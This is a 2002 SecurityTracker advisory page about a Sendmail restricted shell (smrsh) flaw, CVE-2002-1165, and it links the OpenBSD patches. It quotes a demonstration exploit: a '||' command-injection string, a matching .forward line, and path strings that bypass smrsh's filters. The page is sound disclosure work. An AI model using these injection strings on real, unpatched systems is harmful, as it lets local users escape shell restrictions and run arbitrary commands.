SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   Smrsh Vendors:   Sendmail Consortium
(OpenBSD Issues Fix) Re: Sendmail Restricted Shell (smrsh) May Let Local Users Bypass Restrictions to Execute Code
SecurityTracker Alert ID:  1005554
SecurityTracker URL:  http://securitytracker.com/id/1005554
CVE Reference:   CVE-2002-1165   (Links to External Site)
Date:  Nov 7 2002
Impact:   Execution of arbitrary code via local system, User access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  

Description:   A vulnerability was reported in the Sendmail restricted shell (smrsh) utility. A local user may be able to bypass smrsh access restrictions and execute a user-specific binary on the system.

iDEFENSE reported that a local user can insert a special character sequence into their '.forward' file to exploit the flaw.

One method is to insert the '||' string, as shown in the demonstration exploit transcript below:

$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute

According to the report, smrsh will verify that the '.' exists but does not perform verification on files listed after the '||' string, so /tmp/unauth is executed even though it is not located within the '/etc/smrsh' restricted directory. To exploit this, the local user can place the following line in the '.forward' file:

"| . \|| . /tmp/unauth \|| ."

Another method is to provide a command line to smrsh that will be internally converted to a space, thereby bypassing all access filters. Some examples include:

smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"

iDEFENSE credits zen-parse and Pedram Amini with reporting this flaw.

Impact:   A local user can bypass smrsh restrictions and execute arbitrary commands on the system.
Solution:   OpenBSD has issued the following fixes:

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.2/common/003_smrsh.patch

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/017_smrsh.patch

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/034_smrsh.patch

Vendor URL:  www.sendmail.org/ (Links to External Site)
Cause:   Access control error, Input validation error, State error
Underlying OS:  UNIX (OpenBSD)
Underlying OS Comments:  OpenBSD 3.0, 3.1, 3.2

Message History:   This archive entry is a follow-up to the message listed below.
Oct 1 2002 Sendmail Restricted Shell (smrsh) May Let Local Users Bypass Restrictions to Execute Code



 Source Message Contents

Subject:  OpenBSD smrsh bug


SECURITY FIX: November 6, 2002

An attacker can bypass the restrictions imposed by sendmail's restricted shell, smrsh(8),
and execute arbitrary commands with the privileges of his own account.
A source code patch exists which remedies the problem:

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.2/common/003_smrsh.patch

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/017_smrsh.patch

ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/034_smrsh.patch


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC